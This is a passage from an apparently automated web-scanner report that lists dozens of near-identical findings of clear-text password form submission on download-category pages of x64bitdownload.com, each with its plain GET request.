User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.32. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.33. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.34. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.35. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.36. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.37. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.38. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.39. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.40. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.41. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.42. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.43. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.44. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.45. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.46. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.47. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.48. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.49. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.50. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.51. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.52. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.53. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.54. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.55. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.56. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.57. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.58. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.59. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.60. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.61. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.62. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.63. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.64. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.65. http://www.x64bitdownload.com/64-bit-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.66. http://www.x64bitdownload.com/64-bit-reading-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.67. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.68. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.69. http://www.x64bitdownload.com/64-bit-rss-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.70. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-feed-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.71. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rss-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.72. http://www.x64bitdownload.com/64-bit-search-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-search-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.73. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ssl-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.74. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-synchronization-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.75. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronize-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.76. http://www.x64bitdownload.com/64-bit-topic-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-topic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.77. http://www.x64bitdownload.com/64-bit-troll-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.78. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-troll-killer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

2.79. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-trollkiller-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
